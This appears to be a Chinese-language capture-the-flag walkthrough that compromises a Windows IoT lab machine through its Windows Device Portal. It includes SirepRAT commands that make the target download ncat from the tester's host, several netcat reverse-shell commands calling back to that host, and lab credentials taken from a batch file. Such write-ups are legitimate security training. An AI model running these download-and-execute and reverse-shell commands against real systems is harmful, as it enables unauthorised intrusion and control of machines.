基本信息

端口扫描

135,8080:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -Pn -sC -sV 10.10.10.204

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-01 14:12 CST
Nmap scan report for 10.10.10.204
Host is up (0.069s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8080/tcp open upnp Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.32 seconds

8080

Windows Device Portal,需要登录:

看起来是个windows IOT,搜索资料:

可以直接使用:

SirepRAT

download ncat

任意执行命令,例如下载文件:

1
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe -Uri http://10.10.14.15:7778/ncat.exe" --v

reverse shell

使用nc反弹shell:

1
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe 10.10.14.15 4444 -e powershell.exe" --v

whoami报错,可以使用$env:UserName

搜集信息

在这个目录发现一个bat文件,这个文件中有两组账号密码:

1
2
cd "c:\Program Files\WindowsPowershell\Modules\PackageManagement"
ls -force

r.bat

1
2
3
4
5
6
7
8
9
10
11
12
13
14
@echo off

:LOOP

for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls

GOTO :LOOP

Windows Device Portal

回到8080的web,可以使用app:mesh5143登录:

reverse shell

Process -> run command:

1
C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.15 4445 -e powershell.exe

得到app用户shell:

user flag

app用户可以读取user.txt,同样需要通过powershell去读:

1
2
$credential = Import-CliXml -Path U:\Users\app\user.txt
$credential.GetNetworkCredential().Password

root flag

前面bat文件里我们得到了两组密码,administrator也是同样流程,登录8080,执行命令,反弹shell,读取root.txt:

1
2
3
4
5
6
administrator _1nt3rn37ofTh1nGz

C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.15 4446 -e powershell.exe

$credential = Import-CliXml -Path U:\Users\administrator\root.txt
$credential.GetNetworkCredential().Password

参考资料